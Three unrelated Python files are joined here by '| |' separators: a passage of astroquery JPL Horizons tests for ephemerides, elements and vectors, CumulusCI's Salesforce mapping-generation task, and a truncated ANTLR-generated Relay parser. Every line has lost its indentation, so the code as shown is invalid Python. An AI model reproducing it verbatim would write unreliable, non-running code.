res['ObsEclLon'], res['ObsEclLat'], res['GlxLon'],
res['GlxLat'],
res['RA_3sigma'], res['DEC_3sigma']], rtol=1e-3)
def test_ephemerides_query_two(self):
# check comet ephemerides using options
obj = jplhorizons.Horizons(id='Halley', id_type='comet_name',
location='290',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(airmass_lessthan=1.2, skip_daylight=True,
closest_apparition=True,
max_hour_angle=10,
solar_elongation=(150, 180))
assert len(res) == 1
res = res[0]
assert res['targetname'] == "1P/Halley"
assert res['datetime_str'] == "2080-Jan-11 09:00"
assert res['solar_presence'] == ""
assert res['flags'] == "m"
assert res['elongFlag'] == '/L'
for value in ['H', 'G']:
assert value not in res.colnames
def test_ephemerides_query_three(self):
# checks no_fragments option for comets
obj = jplhorizons.Horizons(id='73P', id_type='designation',
location='290',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(closest_apparition=True, no_fragments=True)
assert len(res) == 249
res = res[0]
assert res['targetname'] == "73P/Schwassmann-Wachmann 3"
assert res['datetime_str'] == "2080-Jan-01 00:00"
assert res['solar_presence'] == "*"
assert res['flags'] == "m"
assert res['elongFlag'] == '/L'
for value in ['H', 'G']:
assert value not in res.colnames
def test_ephemerides_query_four(self):
# checks for missing M1 with a comet; 167P satisfies this as
# of 18 June 2018
obj = jplhorizons.Horizons(id='167P', id_type='designation',
location='I41',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(closest_apparition=True,
no_fragments=True)
assert len(res) == 249
res = res[0]
assert res['targetname'] == "167P/CINEOS"
assert res['datetime_str'] == "2080-Jan-01 00:00"
assert res['solar_presence'] == "*"
assert res['flags'] == "m"
assert res['elongFlag'] == '/T'
for value in ['H', 'G', 'M1', 'k1']:
assert value not in res.colnames
for value in ['M2', 'k2', 'phasecoeff']:
assert value in res.colnames
def test_ephemerides_query_five(self):
# checks for missing phase coefficient with a comet; 12P
# satisfies this as of 18 June 2018
obj = jplhorizons.Horizons(id='12P', id_type='designation',
location='I41',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(closest_apparition=True)
assert len(res) == 249
res = res[0]
assert res['targetname'] == "12P/Pons-Brooks"
assert res['datetime_str'] == "2080-Jan-01 00:00"
assert res['solar_presence'] == "*"
assert res['flags'] == "m"
assert res['elongFlag'] == '/L'
for value in ['H', 'G', 'phasecoeff']:
assert value not in res.colnames
for value in ['M1', 'k1', 'M2', 'k2']:
assert value in res.colnames
def test_ephemerides_query_six(self):
# tests optional constrains for ephemerides queries
obj = jplhorizons.Horizons(id='3552', id_type='smallbody',
location='I33',
epochs={'start': '2018-05-01',
'stop': '2018-08-01',
'step': '3h'})
res = obj.ephemerides(skip_daylight=True,
max_hour_angle=8,
refraction=True,
refsystem='B1950',
rate_cutoff=100,
airmass_lessthan=5)
assert len(res) == 32
def test_ephemerides_query_raw(self):
res = (jplhorizons.Horizons(id='Ceres', location='500',
id_type='smallbody', epochs=2451544.5).
ephemerides(get_raw_response=True))
assert len(res) >= 15400
def test_elements_query(self):
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=[2451544.5,
2451545.5]).elements()[0]
assert res['targetname'] == "1 Ceres (A801 AA)"
assert res['datetime_str'] == "A.D. 2000-Jan-01 00:00:00.0000"
assert_quantity_allclose(
[2451544.5,
7.837505767652506E-02, 2.549670133211852E+00,
1.058336086929457E+01,
8.049436516467529E+01, 7.392278852641589E+01,
2.451516163117752E+06,
2.141950393098222E-01, 6.069619607052192E+00,
7.121190541431409E+00,
2.766494282136041E+00, 2.983318431060230E+00,
1.680711192752127E+03],
[res['datetime_jd'],
res['e'], res['q'],
res['incl'],
res['Omega'], res['w'],
res['Tp_jd'],
res['n'], res['M'],
res['nu'],
res['a'], res['Q'],
res['P']], rtol=1e-3)
def test_elements_query_two(self):
obj = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=[2451544.5,
2451545.5])
res = obj.elements(refsystem='B1950',
refplane='earth',
tp_type='relative')[1]
assert_quantity_allclose([23.24472584135690,
132.6482045485004,
-29.33632558181947],
[res['Omega'], res['w'], res['Tp_jd']],
rtol=1e-3)
def test_elements_query_raw(self):
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=2451544.5).elements(
get_raw_response=True)
assert len(res) >= 6686
def test_vectors_query(self):
# check values of Ceres for a given epoch
# orbital uncertainty of Ceres is basically zero
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=2451544.5).vectors()[0]
assert res['targetname'] == "1 Ceres (A801 AA)"
assert res['datetime_str'] == "A.D. 2000-Jan-01 00:00:00.0000"
assert_quantity_allclose(
[2451544.5,
-2.377530254715913E+00, 8.007773098011088E-01,
4.628376171505864E-01,
-3.605422534068209E-03, -1.057883330464988E-02,
3.379791158988872E-04,
1.473392692285918E-02, 2.551100364907553E+00,
1.007960852643289E-04],
[res['datetime_jd'],
res['x'], res['y'],
res['z'],
res['vx'], res['vy'],
res['vz'],
res['lighttime'], res['range'],
res['range_rate']], rtol=1e-3)
def test_vectors_query_raw(self):
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=2451544.5).vectors(
get_raw_response=True)
assert len(res) >= 6412
def test_unknownobject(self):
with pytest.raises(ValueError):
jplhorizons.Horizons(id='spamspamspameggsspam', location='500',
epochs=2451544.5).ephemerides()
def test_multipleobjects(self):
with pytest.raises(ValueError):
jplhorizons.Horizons(id='73P', location='500', id_type='smallbody',
epochs=2451544.5).ephemerides()
def test_uri(self):
target = jplhorizons.Horizons(id='3552', location='500',
id_type='smallbody', epochs=2451544.5)
assert target.uri is None
target.ephemerides()
assert target.uri == ('https://ssd.jpl.nasa.gov/api/horizons.api?'
'format=text&EPHEM_TYPE=OBSERVER&QUANTITIES='
'%271%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10'
'%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19'
'%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28'
'%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37'
'%2C38%2C39%2C40%2C41%2C42%2C43%27&'
'COMMAND=%223552%3B%22&SOLAR_ELONG=%220%2C180'
'%22&LHA_CUTOFF=0&CSV_FORMAT=YES&CAL_FORMAT='
'BOTH&ANG_FORMAT=DEG&APPARENT=AIRLESS&'
'REF_SYSTEM=ICRF&EXTRA_PREC=NO&'
'CENTER=%27500%27&'
'TLIST=2451544.5&SKIP_DAYLT=NO')
def test__userdefinedlocation_ephemerides_query(self):
anderson_mesa = {'lon': -111.535833,
'lat': 35.096944,
'elevation': 2.163}
am_res = jplhorizons.Horizons(id='Ceres',
location='688',
id_type='smallbody',
epochs=2451544.5).ephemerides()[0]
user_res = jplhorizons.Horizons(id='Ceres',
location=anderson_mesa,
id_type='smallbody',
epochs=2451544.5).ephemerides()[0]
assert_quantity_allclose([am_res['RA'], am_res['DEC']],
[user_res['RA'], user_res['DEC']])
def test_majorbody(self):
"""Regression test for "Fix missing columns... #1268"
https://github.com/astropy/astroquery/pull/1268
Horizons.ephemerides would crash for majorbodies because the
returned columns have different names from other bodies. The
culprits were: Obsrv-lon, Obsrv-lat, Solar-lon, Solar-lat
"""
epochs = dict(start='2019-01-01', stop='2019-01-02', step='1d')
quantities = ('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'
'21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,'
'38,39,40,41,42,43')
target = jplhorizons.Horizons(id='301', location='688', epochs=epochs)
eph = target.ephemerides(quantities=quantities)
assert len(eph) == 2
def test_airmass(self):
"""Regression test for "Airmass issues with jplhorizons #1284"
Horizons.ephemerides would crash when Horizons returned tables
with no masked data. The error occurs when attempting to fill
bad values in the 'a-mass' column:
``data['a-mass'].filled(99)``. However, with no masked data,
ascii.read returns a normal Table, and the 'a-mass' column was
missing the ``filled`` method.
In addition, the same lines would crash if airmass was not
requested in the returned table.
"""
# verify data['a-mass'].filled(99) works:
target = jplhorizons.Horizons('Ceres', location='I41',
id_type='smallbody',
epochs=[2458300.5])
eph = target.ephemerides(quantities='1,8')
assert len(eph) == 1
# skip data['a-mass'].filled(99) if 'a-mass' not returned
eph = target.ephemerides(quantities='1')
assert len(eph) == 1
def test_vectors_aberrations(self):
"""Check functionality of `aberrations` options"""
obj = jplhorizons.Horizons(id='1', epochs=2458500, location='500@0',
id_type='smallbody')
vec = obj.vectors(aberrations='geometric')
assert_quantity_allclose(vec['x'][0], -2.086487005013347)
vec = obj.vectors(aberrations='astrometric')
assert_quantity_allclose(vec['x'][0], -2.086576286974797)
vec = obj.vectors(aberrations='apparent')
assert_quantity_allclose(vec['x'][0], -2.086576286974797)
def test_vectors_delta_T(self):
obj = jplhorizons.Horizons(id='1', epochs=2458500, location='500@0',
id_type='smallbody')
vec = obj.vectors(delta_T=False)
assert 'delta_T' not in vec.columns
vec = obj.vectors(delta_T=True)
assert_quantity_allclose(vec['delta_T'][0], 69.184373)
def test_ephemerides_extraprecision(self):
obj = jplhorizons.Horizons(id='1', epochs=2458500, location='G37',
id_type='smallbody')
vec_simple = obj.ephemerides(extra_precision=False)
vec_highprec = obj.ephemerides(extra_precision=True)
assert (vec_simple['RA'][0]-vec_highprec['RA'][0]) > 1e-7
| |
from collections import defaultdict
from typing import Dict
import click
import yaml
from cumulusci.core.utils import process_list_arg, process_bool_arg
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
from cumulusci.core.exceptions import TaskOptionsError
class GenerateMapping(BaseSalesforceApiTask):
task_docs = """
Generate a mapping file for use with the `extract_dataset` and `load_dataset` tasks.
This task will examine the schema in the specified org and attempt to infer a
mapping suitable for extracting data in packaged and custom objects as well as
customized standard objects.
Mappings must be serializable, and hence must resolve reference cycles - situations
where Object A refers to B, and B also refers to A. Mapping generation will stop
and request user input to resolve such cycles by identifying the correct load order.
If you would rather the mapping generator break such a cycle randomly, set the
`break_cycles` option to `auto`.
Alternately, specify the `ignore` option with the name of one of the
lookup fields to suppress it and break the cycle. `ignore` can be specified as a list in
`cumulusci.yml` or as a comma-separated string at the command line.
In most cases, the mapping generated will need minor tweaking by the user. Note
that the mapping omits features that are not currently well supported by the
`extract_dataset` and `load_dataset` tasks, such as references to
the `User` object.
"""
task_options = {
"path": {"description": "Location to write the mapping file", "required": True},
"namespace_prefix": {"description": "The namespace prefix to use"},
"ignore": {
"description": "Object API names, or fields in Object.Field format, to ignore"
},
"break_cycles": {
"description": "If the generator is unsure of the order to load, what to do? "
"Set to `ask` (the default) to allow the user to choose or `auto` to pick randomly."
},
"include": {
"description": "Object names to include even if they might not otherwise be included."
},
"strip_namespace": {
"description": "If True, CumulusCI removes the project's namespace where found in fields "
" and objects to support automatic namespace injection. On by default."
},
}
core_fields = ["Name", "FirstName", "LastName"]
def _init_options(self, kwargs):
super(GenerateMapping, self)._init_options(kwargs)
if "namespace_prefix" not in self.options:
self.options["namespace_prefix"] = ""
if self.options["namespace_prefix"] and not self.options[
"namespace_prefix"
].endswith("__"):
self.options["namespace_prefix"] += "__"
self.options["ignore"] = process_list_arg(self.options.get("ignore", []))
break_cycles = self.options.setdefault("break_cycles", "ask")
if break_cycles not in ["ask", "auto"]:
raise TaskOptionsError(
f"`break_cycles` should be `ask` or `auto`, not {break_cycles}"
)
self.options["include"] = process_list_arg(self.options.get("include", []))
strip_namespace = self.options.get("strip_namespace")
self.options["strip_namespace"] = process_bool_arg(
True if strip_namespace is None else strip_namespace
)
def _run_task(self):
self.logger.info("Collecting sObject information")
self._collect_objects()
self._build_schema()
filename = self.options["path"]
self.logger.info(f"Creating mapping schema {filename}")
self._build_mapping()
with open(filename, "w") as f:
yaml.dump(self.mapping, f, sort_keys=False)
def _collect_objects(self):
"""Walk the global describe and identify the sObjects we need to include in a minimal operation."""
self.mapping_objects = self.options["include"]
# Cache the global describe, which we'll walk.
self.global_describe = self.sf.describe()
sobject_names = set(obj["name"] for obj in self.global_describe["sobjects"])
unknown_objects = set(self.mapping_objects) - sobject_names
if unknown_objects:
raise TaskOptionsError(f"{unknown_objects} cannot be found in the org.")
# First, we'll get a list of all objects that are either
# (a) custom, no namespace
# (b) custom, with our namespace
# (c) not ours (standard or other package), but have fields with our namespace or no namespace
self.describes = {} # Cache per-object describes for efficiency
for obj in self.global_describe["sobjects"]:
self.describes[obj["name"]] = getattr(self.sf, obj["name"]).describe()
if self._is_our_custom_api_name(obj["name"]) or self._has_our_custom_fields(
self.describes[obj["name"]]
):
if (
self._is_object_mappable(obj)
and obj["name"] not in self.mapping_objects
):
self.mapping_objects.append(obj["name"])
# Add any objects that are required by our own,
# meaning any object we are looking up to with a custom field,
# or any master-detail parent of any included object.
index = 0
while index < len(self.mapping_objects):
obj = self.mapping_objects[index]
for field in self.describes[obj]["fields"]:
if field["type"] == "reference":
if field["relationshipOrder"] == 1 or self._is_any_custom_api_name(
field["name"]
):
self.mapping_objects.extend(
[
obj
for obj in field["referenceTo"]
if obj not in self.mapping_objects
and self._is_object_mappable(self.describes[obj])
]
)
index += 1
def _build_schema(self):
"""Convert self.mapping_objects into a schema, including field details and interobject references,
in self.schema and self.refs"""
# Now, find all the fields we need to include.
# For custom objects, we include all custom fields. This includes custom objects
# that our package doesn't own.
# For standard objects, we include all custom fields, all required standard fields,
# and master-detail relationships. Required means createable and not nillable.
# In all cases, ensure that RecordTypeId is included if and only if there are Record Types
self.schema = {}
self.refs = defaultdict(lambda: defaultdict(dict))
for obj in self.mapping_objects:
self.schema[obj] = {}
for field in self.describes[obj]["fields"]:
if any(
[
self._is_any_custom_api_name(field["name"]),
self._is_core_field(field["name"]),
self._is_required_field(field),
self._is_lookup_to_included_object(field),
]
):
if self._is_field_mappable(obj, field):
self.schema[obj][field["name"]] = field
if field["type"] == "reference":
for target in field["referenceTo"]:
# We've already vetted that this field is referencing
# included objects, via `_is_field_mappable()`
if target != obj:
self.refs[obj][target][field["name"]] = FieldData(
field
)
if (
field["name"] == "RecordTypeId"
and len(self.describes[obj]["recordTypeInfos"]) > 1
):
# "Master" is included even if no RTs.
self.schema[obj][field["name"]] = field
def _build_mapping(self):
"""Output self.schema in mapping file format by constructing a dict and serializing to YAML"""
objs = list(self.schema.keys())
assert all(objs)
stack = self._split_dependencies(objs, self.refs)
ns = self.project_config.project__package__namespace
def strip_namespace(element):
if self.options["strip_namespace"] and ns and element.startswith(f"{ns}__"):
return element[len(ns) + 2 :]
else:
return element
self.mapping = {}
for orig_obj in stack:
# Check if it's safe for us to strip the namespace from this object
stripped_obj = strip_namespace(orig_obj)
obj = stripped_obj if stripped_obj not in stack else orig_obj
key = f"Insert {obj}"
self.mapping[key] = {}
self.mapping[key]["sf_object"] = obj
fields = []
lookups = []
for field in self.schema[orig_obj].values():
if field["type"] == "reference" and field["name"] != "RecordTypeId":
# For lookups, namespace stripping takes place below.
lookups.append(field["name"])
else:
fields.append(field["name"])
if fields:
fields_stripped = [
strip_namespace(f) if strip_namespace(f) not in fields else f
for f in fields
]
fields_stripped.sort()
self.mapping[key]["fields"] = fields_stripped
if lookups:
lookups.sort()
self.mapping[key]["lookups"] = {}
for orig_field in lookups:
# First, determine what manner of lookup we have here.
stripped_field = (
strip_namespace(orig_field)
if strip_namespace(orig_field) not in lookups
else orig_field
)
referenceTo = self.schema[orig_obj][orig_field]["referenceTo"]
if len(referenceTo) > 1: # Polymorphic lookup
self.logger.warning(
f"Field {orig_obj}.{orig_field} is a polymorphic lookup, which is not supported"
)
else:
orig_reference = referenceTo[0]
# Can we safely namespace-strip this reference?
stripped_reference = (
strip_namespace(orig_reference)
if strip_namespace(orig_reference) not in stack
else orig_reference
)
if orig_reference == orig_obj: # Self-lookup
self.mapping[key]["lookups"][stripped_field] = {
"table": stripped_reference,
"after": key,
}
elif stack.index(orig_reference) > stack.index(
orig_obj
): # Dependent lookup
self.mapping[key]["lookups"][stripped_field] = {
"table": stripped_reference,
"after": f"Insert {stripped_reference}",
}
else: # Regular lookup
self.mapping[key]["lookups"][stripped_field] = {
"table": stripped_reference
}
def _split_dependencies(self, objs, dependencies):
"""Attempt to flatten the object network into a sequence of load operations."""
stack = []
objs_remaining = sorted(objs)
# The structure of `dependencies` is:
# key = object, value = set of objects it references.
# Iterate through our list of objects
# For each object, if it is not dependent on any other objects, place it at the end of the stack.
# Once an object is placed in the stack, remove dependencies to it (they're satisfied)
while objs_remaining:
objs_without_deps = [
obj
for obj in objs_remaining
if obj not in dependencies or not dependencies[obj]
]
assert all(objs_without_deps)
if not objs_without_deps:
choice = self.choose_next_object(objs_remaining, dependencies)
assert choice
objs_without_deps = [choice]
for obj in objs_without_deps:
stack.append(obj)
# Remove all dependencies on this object (they're satisfied)
for other_obj in dependencies:
if obj in dependencies.get(other_obj):
del dependencies[other_obj][obj]
# Remove this object from our remaining set.
objs_remaining.remove(obj)
return stack
def find_free_object(self, objs_remaining: list, dependencies: dict):
# if you change this code, remember that
# peeking into a generator consumes it
free_objs = (
sobj
for sobj in objs_remaining
if only_has_soft_dependencies(sobj, dependencies[sobj])
)
first_free_obj = next(free_objs, None)
return first_free_obj
def choose_next_object(self, objs_remaining: list, dependencies: dict):
free_obj = self.find_free_object(objs_remaining, dependencies)
if free_obj:
return free_obj
if self.options["break_cycles"] == "auto":
return tuple(objs_remaining)[0]
else:
return self.ask_user(objs_remaining, dependencies)
def ask_user(self, objs_remaining, dependencies):
self.logger.info(
"CumulusCI needs help to complete the mapping; the schema contains reference cycles and unresolved dependencies."
)
self.logger.info("Remaining objects:")
for obj in objs_remaining:
self.logger.info(obj)
for other_obj in dependencies[obj]:
self.logger.info(
f" references {other_obj} via: {', '.join(dependencies[obj][other_obj])}"
)
return click.prompt(
"Which object should we load first?",
type=click.Choice(tuple(objs_remaining)),
show_choices=True,
)
def _is_any_custom_api_name(self, api_name):
"""True if the entity name is custom (including any package)."""
return api_name.endswith("__c")
def _is_our_custom_api_name(self, api_name):
"""True if the entity name is custom and has our namespace prefix (if we have one)
or if the entity does not have a namespace"""
return self._is_any_custom_api_name(api_name) and (
(
self.options["namespace_prefix"]
and api_name.startswith(self.options["namespace_prefix"])
)
or api_name.count("__") == 1
)
def _is_core_field(self, api_name):
"""True if this field is one that we should always include regardless
of other settings or field configuration, such as Contact.FirstName.
DB-level required fields don't need to be so handled."""
return api_name in self.core_fields
def _is_object_mappable(self, obj):
"""True if this object is one we can map, meaning it's an sObject and not
some other kind of entity, it's not ignored, it's Bulk API compatible,
and it's not in a hard-coded list of entities we can't currently handle."""
return not any(
[
obj["name"] in self.options["ignore"], # User-specified exclusions
obj["name"].endswith(
"ChangeEvent"
), # Change Data Capture entities (which get custom fields)
obj["name"].endswith("__mdt"), # Custom Metadata Types (MDAPI only)
obj["name"].endswith("__e"), # Platform Events
obj["customSetting"], # Not Bulk API compatible
obj["name"] # Objects we can't or shouldn't load/save
in [
"User",
"Group",
"LookedUpFromActivity",
"OpenActivity",
"Task",
"Event",
"ActivityHistory",
],
]
)
def _is_field_mappable(self, obj, field):
"""True if this field is one we can map, meaning it's not ignored,
it's createable by the Bulk API, it's not a deprecated field,
and it's not a type of reference we can't handle without special
configuration (self-lookup or reference to objects not included
in this operation)."""
return not any(
[
field["name"] == "Id", # Omit Id fields for auto-pks
f"{obj}.{field['name']}" in self.options["ignore"], # User-ignored list
"(Deprecated)" in field["label"], # Deprecated managed fields
field["type"] == "base64", # No Bulk API support for base64 blob fields
not field["createable"], # Non-writeable fields
field["type"] == "reference" # Outside lookups
and not self._are_lookup_targets_in_operation(field),
]
)
def _is_required_field(self, field):
"""True if the field is either database-level required or a master-detail
relationship field."""
return (field["createable"] and not field["nillable"]) or (
field["type"] == "reference" and field["relationshipOrder"] == 1
)
def _has_our_custom_fields(self, obj):
"""True if the object is owned by us or contains any field owned by us."""
return any(
[self._is_our_custom_api_name(field["name"]) for field in obj["fields"]]
)
def _are_lookup_targets_in_operation(self, field):
"""True if this lookup field aims at objects we are already including (all targets
must match, although we don't provide actual support for polymorphism)."""
return all([f in self.mapping_objects for f in field["referenceTo"]])
def _is_lookup_to_included_object(self, field):
"""True if this field is a lookup and also references only objects we are
already including."""
return field["type"] == "reference" and self._are_lookup_targets_in_operation(
field
)
class FieldData:
nillable: bool
def __init__(self, describe_data: dict):
self.nillable = describe_data.get("nillable", False)
def __eq__(self, other: "FieldData"):
return self.__dict__ == other.__dict__
def only_has_soft_dependencies(
sobj: str, obj_dependencies: Dict[str, Dict[str, FieldData]]
):
for target_obj, field_deps in obj_dependencies.items():
for field_name, field_data in field_deps.items():
# all nillable references are considered soft dependencies.
#
# A single hard dependency renders an object "not yet free"
if not field_data.nillable:
return False
return True
| |
# Generated from /home/marisa/Work/tvm/python/tvm/relay/grammar/Relay.g4 by ANTLR 4.7.1
# encoding: utf-8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3*")
buf.write("\u014c\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\3\2\3\2\3\3\3\3\7\3+\n\3\f\3\16\3.\13\3\3\3\5\3\61\n")
buf.write("\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4")
buf.write("\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\6\4H\n\4\r\4\16\4I\3")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\7\4R\n\4\f\4\16\4U\13\4\5\4W\n")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\5\4d\n")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\5\4n\n\4\3\4\3\4\3")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4")
buf.write("\5\4\u0080\n\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4")
buf.write("\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\7\4\u0096\n\4")
buf.write("\f\4\16\4\u0099\13\4\5\4\u009b\n\4\3\4\7\4\u009e\n\4\f")
buf.write("\4\16\4\u00a1\13\4\3\5\3\5\5\5\u00a5\n\5\3\5\3\5\3\5\3")
buf.write("\5\3\5\5\5\u00ac\n\5\3\5\3\5\3\6\3\6\3\6\5\6\u00b3\n\6")
buf.write("\3\6\3\6\3\6\3\6\3\6\5\6\u00ba\n\6\3\6\3\6\3\7\3\7\3\7")
buf.write("\3\7\3\7\3\7\5\7\u00c4\n\7\3\b\3\b\3\b\7\b\u00c9\n\b\f")
buf.write("\b\16\b\u00cc\13\b\5\b\u00ce\n\b\3\t\3\t\3\t\5\t\u00d3")
buf.write("\n\t\3\n\3\n\3\n\7\n\u00d8\n\n\f\n\16\n\u00db\13\n\5\n")
buf.write("\u00dd\n\n\3\13\3\13\3\13\3\13\3\f\3\f\3\f\3\f\3\f\3\f")
buf.write("\7\f\u00e9\n\f\f\f\16\f\u00ec\13\f\3\f\3\f\5\f\u00f0\n")
buf.write("\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\6\r\u00fd")
buf.write("\n\r\r\r\16\r\u00fe\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3")
buf.write("\r\3\r\3\r\3\r\5\r\u010d\n\r\3\r\3\r\3\r\3\r\7\r\u0113")
buf.write("\n\r\f\r\16\r\u0116\13\r\5\r\u0118\n\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\5\r\u011f\n\r\3\16\3\16\3\16\3\16\3\16\3\16\3\16")
buf.write("\3\16\3\16\3\16\3\16\6\16\u012c\n\16\r\16\16\16\u012d")
buf.write("\3\16\3\16\5\16\u0132\n\16\3\17\3\17\3\17\3\17\3\17\5")
buf.write("\17\u0139\n\17\3\20\3\20\3\21\3\21\3\21\3\21\3\22\3\22")
buf.write("\3\22\5\22\u0144\n\22\3\23\3\23\3\23\3\23\5\23\u014a\n")
buf.write("\23\3\23\2\3\6\24\2\4\6\b\n\f\16\20\22\24\26\30\32\34")
buf.write("\36 \"$\2\6\3\2\31\32\3\2\33\34\3\2\35 \3\2!\"\2\u0175")
buf.write("\2&\3\2\2\2\4(\3\2\2\2\6\177\3\2\2\2\b\u00a2\3\2\2\2\n")
buf.write("\u00af\3\2\2\2\f\u00c3\3\2\2\2\16\u00cd\3\2\2\2\20\u00cf")
buf.write("\3\2\2\2\22\u00dc\3\2\2\2\24\u00de\3\2\2\2\26\u00ef\3")
buf.write("\2\2\2\30\u011e\3\2\2\2\32\u0131\3\2\2\2\34\u0138\3\2")
buf.write("\2\2\36\u013a\3\2\2\2 \u013c\3\2\2\2\"\u0143\3\2\2\2$")
buf.write("\u0149\3\2\2\2&\'\7*\2\2\'\3\3\2\2\2(\60\7\25\2\2)+\5")
buf.write("\n\6\2*)\3\2\2\2+.\3\2\2\2,*\3\2\2\2,-\3\2\2\2-\61\3\2")
buf.write("\2\2.,\3\2\2\2/\61\5\6\4\2\60,\3\2\2\2\60/\3\2\2\2\61")
buf.write("\62\3\2\2\2\62\63\7\2\2\3\63\5\3\2\2\2\64\65\b\4\1\2\65")
buf.write("\66\7\3\2\2\66\67\5\6\4\2\678\7\4\2\28\u0080\3\2\2\29")
buf.write(":\7\34\2\2:\u0080\5\6\4\23;\u0080\5\b\5\2<=\7\3\2\2=\u0080")
buf.write("\7\4\2\2>?\7\3\2\2?@\5\6\4\2@A\7\5\2\2AB\7\4\2\2B\u0080")
buf.write("\3\2\2\2CD\7\3\2\2DG\5\6\4\2EF\7\5\2\2FH\5\6\4\2GE\3\2")
buf.write("\2\2HI\3\2\2\2IG\3\2\2\2IJ\3\2\2\2JK\3\2\2\2KL\7\4\2\2")
buf.write("L\u0080\3\2\2\2MV\7\6\2\2NS\5\6\4\2OP\7\5\2\2PR\5\6\4")
buf.write("\2QO\3\2\2\2RU\3\2\2\2SQ\3\2\2\2ST\3\2\2\2TW\3\2\2\2U")
buf.write("S\3\2\2\2VN\3\2\2\2VW\3\2\2\2WX\3\2\2\2X\u0080\7\7\2\2")
buf.write("YZ\7\b\2\2Z[\7\3\2\2[\\\5\6\4\2\\]\7\4\2\2]^\5 \21\2^")
buf.write("_\7\t\2\2_`\5 \21\2`\u0080\3\2\2\2ac\7\n\2\2bd\7&\2\2")
buf.write("cb\3\2\2\2cd\3\2\2\2de\3\2\2\2ef\5\20\t\2fg\7\13\2\2g")
buf.write("h\5\6\4\2hi\7\f\2\2ij\5\6\4\bj\u0080\3\2\2\2km\7\n\2\2")
buf.write("ln\7&\2\2ml\3\2\2\2mn\3\2\2\2no\3\2\2\2op\5\20\t\2pq\7")
buf.write("\13\2\2qr\7\r\2\2rs\5\6\4\2st\7\16\2\2tu\7\f\2\2uv\5\6")
buf.write("\4\7v\u0080\3\2\2\2wx\5$\23\2xy\7\13\2\2yz\5\6\4\2z{\7")
buf.write("\f\2\2{|\5\6\4\5|\u0080\3\2\2\2}\u0080\5$\23\2~\u0080")
buf.write("\5\"\22\2\177\64\3\2\2\2\1779\3\2\2\2\177;\3\2\2\2\177")
buf.write("<\3\2\2\2\177>\3\2\2\2\177C\3\2\2\2\177M\3\2\2\2\177Y")
buf.write("\3\2\2\2\177a\3\2\2\2\177k\3\2\2\2\177w\3\2\2\2\177}\3")
buf.write("\2\2\2\177~\3\2\2\2\u0080\u009f\3\2\2\2\u0081\u0082\f")
buf.write("\22\2\2\u0082\u0083\t\2\2\2\u0083\u009e\5\6\4\23\u0084")
buf.write("\u0085\f\21\2\2\u0085\u0086\t\3\2\2\u0086\u009e\5\6\4")
buf.write("\22\u0087\u0088\f\20\2\2\u0088\u0089\t\4\2\2\u0089\u009e")
buf.write("\5\6\4\21\u008a\u008b\f\17\2\2\u008b\u008c\t\5\2\2\u008c")
buf.write("\u009e\5\6\4\20\u008d\u008e\f\6\2\2\u008e\u008f\7\f\2")
buf.write("\2\u008f\u009e\5\6\4\7\u0090\u0091\f\24\2\2\u0091\u009a")
buf.write("\7\3\2\2\u0092\u0097\5\6\4\2\u0093\u0094\7\5\2\2\u0094")
buf.write("\u0096\5\6\4\2\u0095\u0093\3\2\2\2\u0096\u0099\3\2\2\2")
buf.write("\u0097\u0095\3\2\2\2\u0097\u0098\3\2\2\2\u0098\u009b\3")
buf.write("\2\2\2\u0099\u0097\3\2\2\2\u009a\u0092\3\2\2\2\u009a\u009b")
buf.write("\3\2\2\2\u009b\u009c\3\2\2\2\u009c\u009e\7\4\2\2\u009d")
buf.write("\u0081\3\2\2\2\u009d\u0084\3\2\2\2\u009d\u0087\3\2\2\2")
buf.write("\u009d\u008a\3\2\2\2\u009d\u008d\3\2\2\2\u009d\u0090\3")
buf.write("\2\2\2\u009e\u00a1\3\2\2\2\u009f\u009d\3\2\2\2\u009f\u00a0")
buf.write("\3\2\2\2\u00a0\7\3\2\2\2\u00a1\u009f\3\2\2\2\u00a2\u00a4")
buf.write("\7\17\2\2\u00a3\u00a5\5\26\f\2\u00a4\u00a3\3\2\2\2\u00a4")
buf.write("\u00a5\3\2\2\2\u00a5\u00a6\3\2\2\2\u00a6\u00a7\7\3\2\2")
